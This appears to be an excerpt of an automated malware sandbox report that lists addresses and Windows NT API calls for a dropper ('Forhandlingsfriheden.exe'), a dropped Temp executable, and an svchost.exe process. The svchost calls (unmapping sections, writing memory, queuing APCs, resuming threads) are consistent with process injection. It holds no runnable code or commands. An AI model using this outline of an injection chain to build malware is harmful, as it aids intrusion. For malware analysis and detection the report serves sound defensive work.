Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03774650 NtSuspendThread,LdrInitializeThunk,	9_2_03774650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772B60 NtClose,LdrInitializeThunk,	9_2_03772B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_03772BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772BE0 NtQueryValueKey,LdrInitializeThunk,	9_2_03772BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772BA0 NtEnumerateValueKey,LdrInitializeThunk,	9_2_03772BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772AF0 NtWriteFile,LdrInitializeThunk,	9_2_03772AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772AD0 NtReadFile,LdrInitializeThunk,	9_2_03772AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772F30 NtCreateSection,LdrInitializeThunk,	9_2_03772F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772FE0 NtCreateFile,LdrInitializeThunk,	9_2_03772FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772FB0 NtResumeThread,LdrInitializeThunk,	9_2_03772FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772EE0 NtQueueApcThread,LdrInitializeThunk,	9_2_03772EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772E80 NtReadVirtualMemory,LdrInitializeThunk,	9_2_03772E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772D30 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_03772D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772D10 NtMapViewOfSection,LdrInitializeThunk,	9_2_03772D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_03772DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772DD0 NtDelayExecution,LdrInitializeThunk,	9_2_03772DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_03772C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772C60 NtCreateKey,LdrInitializeThunk,	9_2_03772C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772CA0 NtQueryInformationToken,LdrInitializeThunk,	9_2_03772CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037735C0 NtCreateMutant,LdrInitializeThunk,	9_2_037735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037739B0 NtGetContextThread,LdrInitializeThunk,	9_2_037739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772B80 NtQueryInformationFile,	9_2_03772B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772AB0 NtWaitForSingleObject,	9_2_03772AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772F60 NtCreateProcessEx,	9_2_03772F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772FA0 NtQuerySection,	9_2_03772FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772F90 NtProtectVirtualMemory,	9_2_03772F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772E30 NtWriteVirtualMemory,	9_2_03772E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772EA0 NtAdjustPrivilegesToken,	9_2_03772EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772D00 NtSetInformationFile,	9_2_03772D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772DB0 NtEnumerateKey,	9_2_03772DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772C00 NtQueryInformationProcess,	9_2_03772C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772CF0 NtOpenProcess,	9_2_03772CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03772CC0 NtQueryVirtualMemory,	9_2_03772CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03773010 NtOpenDirectoryObject,	9_2_03773010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03773090 NtSetValueKey,	9_2_03773090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03773D70 NtOpenThread,	9_2_03773D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03773D10 NtOpenProcessToken,	9_2_03773D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029D9230 NtCreateFile,	9_2_029D9230
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029D9390 NtReadFile,	9_2_029D9390
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029D9670 NtAllocateVirtualMemory,	9_2_029D9670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029D9480 NtDeleteFile,	9_2_029D9480
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029D9520 NtClose,	9_2_029D9520

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe

Code function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040351C

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Code function: 0_2_00406C5F	0_2_00406C5F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86FFB1	6_2_1F86FFB1
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86FF09	6_2_1F86FF09
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B1F92	6_2_1F7B1F92
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B9EB0	6_2_1F7B9EB0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3D40	6_2_1F7B3D40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CFDC0	6_2_1F7CFDC0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F861D5A	6_2_1F861D5A
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F867D73	6_2_1F867D73
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86FCF2	6_2_1F86FCF2
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F829C32	6_2_1F829C32
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F825BF0	6_2_1F825BF0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7EDBF9	6_2_1F7EDBF9
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86FB76	6_2_1F86FB76
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CFB80	6_2_1F7CFB80
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F851AA3	6_2_1F851AA3
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84DAAC	6_2_1F84DAAC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85DAC6	6_2_1F85DAC6
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F867A46	6_2_1F867A46
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86FA49	6_2_1F86FA49
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7F5AA0	6_2_1F7F5AA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F823A6C	6_2_1F823A6C
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B9950	6_2_1F7B9950
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CB950	6_2_1F7CB950
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F845910	6_2_1F845910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F81D800	6_2_1F81D800
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B38E0	6_2_1F7B38E0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86F7B0	6_2_1F86F7B0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8616CC	6_2_1F8616CC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7F5630	6_2_1F7F5630
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84D5B0	6_2_1F84D5B0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F867571	6_2_1F867571
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A1460	6_2_1F7A1460
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86F43F	6_2_1F86F43F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79D34C	6_2_1F79D34C
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86132D	6_2_1F86132D
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7F739A	6_2_1F7F739A
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8512ED	6_2_1F8512ED
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CB2C0	6_2_1F7CB2C0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B52A0	6_2_1F7B52A0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F172	6_2_1F79F172
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E516C	6_2_1F7E516C
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7BB1B0	6_2_1F7BB1B0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F87B16B	6_2_1F87B16B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85F0CC	6_2_1F85F0CC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86F0E0	6_2_1F86F0E0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8670E9	6_2_1F8670E9
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B70C0	6_2_1F7B70C0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82EFA0	6_2_1F82EFA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D0F30	6_2_1F7D0F30
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7F2F28	6_2_1F7F2F28
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7BCFE0	6_2_1F7BCFE0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A2FC8	6_2_1F7A2FC8
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F852F30	6_2_1F852F30
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F824F40	6_2_1F824F40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86CE93	6_2_1F86CE93
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B0E59	6_2_1F7B0E59
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86EEDB	6_2_1F86EEDB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86EE26	6_2_1F86EE26
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7C2E90	6_2_1F7C2E90
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7BAD00	6_2_1F7BAD00
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7AADE0	6_2_1F7AADE0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84CD1F	6_2_1F84CD1F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7C8DBF	6_2_1F7C8DBF
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F850CB5	6_2_1F850CB5
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B0C00	6_2_1F7B0C00
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A0CF2	6_2_1F7A0CF2
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F866BD7	6_2_1F866BD7
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86AB40	6_2_1F86AB40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7AEA80	6_2_1F7AEA80
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7C6962	6_2_1F7C6962
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F87A9A6	6_2_1F87A9A6
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B29A0	6_2_1F7B29A0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7BA840	6_2_1F7BA840
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B2840	6_2_1F7B2840
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DE8F0	6_2_1F7DE8F0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7968B8	6_2_1F7968B8
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B0770	6_2_1F7B0770
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D4750	6_2_1F7D4750
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7AC7C0	6_2_1F7AC7C0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CC6E0	6_2_1F7CC6E0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F870591	6_2_1F870591
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B0535	6_2_1F7B0535
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85E4F6	6_2_1F85E4F6
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F854420	6_2_1F854420
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F862446	6_2_1F862446
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8703E6	6_2_1F8703E6
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7BE3F0	6_2_1F7BE3F0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F86A352	6_2_1F86A352
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8302C0	6_2_1F8302C0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F850274	6_2_1F850274
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8641A2	6_2_1F8641A2
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8701AA	6_2_1F8701AA
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8681CC	6_2_1F8681CC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A0100	6_2_1F7A0100
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84A118	6_2_1F84A118
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F838158	6_2_1F838158
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F842000	6_2_1F842000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037FA352	9_2_037FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_038003E6	9_2_038003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0374E3F0	9_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037E0274	9_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037C02C0	9_2_037C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037C8158	9_2_037C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_038001AA	9_2_038001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037DA118	9_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03730100	9_2_03730100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037F81CC	9_2_037F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037F41A2	9_2_037F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037D2000	9_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03740770	9_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03764750	9_2_03764750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0373C7C0	9_2_0373C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0375C6E0	9_2_0375C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03800591	9_2_03800591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03740535	9_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037F2446	9_2_037F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037E4420	9_2_037E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037EE4F6	9_2_037EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037FAB40	9_2_037FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037F6BD7	9_2_037F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0373EA80	9_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03756962	9_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0380A9A6	9_2_0380A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037429A0	9_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0374A840	9_2_0374A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03742840	9_2_03742840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0376E8F0	9_2_0376E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037268B8	9_2_037268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037B4F40	9_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03760F30	9_2_03760F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037E2F30	9_2_037E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03782F28	9_2_03782F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0374CFE0	9_2_0374CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03732FC8	9_2_03732FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037BEFA0	9_2_037BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03740E59	9_2_03740E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037FEE26	9_2_037FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037FEEDB	9_2_037FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03752E90	9_2_03752E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037FCE93	9_2_037FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037DCD1F	9_2_037DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0374AD00	9_2_0374AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0373ADE0	9_2_0373ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03758DBF	9_2_03758DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03740C00	9_2_03740C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03730CF2	9_2_03730CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037E0CB5	9_2_037E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0372D34C	9_2_0372D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037F132D	9_2_037F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0378739A	9_2_0378739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037E12ED	9_2_037E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0375B2C0	9_2_0375B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037452A0	9_2_037452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0372F172	9_2_0372F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0377516C	9_2_0377516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0374B1B0	9_2_0374B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0380B16B	9_2_0380B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037F70E9	9_2_037F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037FF0E0	9_2_037FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037EF0CC	9_2_037EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037470C0	9_2_037470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037FF7B0	9_2_037FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03785630	9_2_03785630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037F16CC	9_2_037F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037F7571	9_2_037F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_038095C3	9_2_038095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037DD5B0	9_2_037DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03731460	9_2_03731460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037FF43F	9_2_037FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037FFB76	9_2_037FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037B5BF0	9_2_037B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0377DBF9	9_2_0377DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0375FB80	9_2_0375FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037B3A6C	9_2_037B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037FFA49	9_2_037FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037F7A46	9_2_037F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037EDAC6	9_2_037EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037DDAAC	9_2_037DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03785AA0	9_2_03785AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037E1AA3	9_2_037E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03749950	9_2_03749950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0375B950	9_2_0375B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037D5910	9_2_037D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037AD800	9_2_037AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037438E0	9_2_037438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037FFF09	9_2_037FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03703FD2	9_2_03703FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03703FD5	9_2_03703FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037FFFB1	9_2_037FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03741F92	9_2_03741F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03749EB0	9_2_03749EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037F7D73	9_2_037F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037F1D5A	9_2_037F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03743D40	9_2_03743D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0375FDC0	9_2_0375FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037B9C32	9_2_037B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_037FFCF2	9_2_037FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029C1D70	9_2_029C1D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029BAE50	9_2_029BAE50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029BCE50	9_2_029BCE50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029BAF94	9_2_029BAF94
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029BAFA0	9_2_029BAFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029BCC30	9_2_029BCC30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029BCC27	9_2_029BCC27
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029B11B2	9_2_029B11B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029C3630	9_2_029C3630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029C5430	9_2_029C5430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029DBB20	9_2_029DBB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0360E306	9_2_0360E306
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0360E309	9_2_0360E309
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0360E7BC	9_2_0360E7BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0360E424	9_2_0360E424
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0360CB23	9_2_0360CB23
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0360E93C	9_2_0360E93C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0360D888	9_2_0360D888

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03787E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 037BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03775130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0372B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 037AEA12 appears 86 times
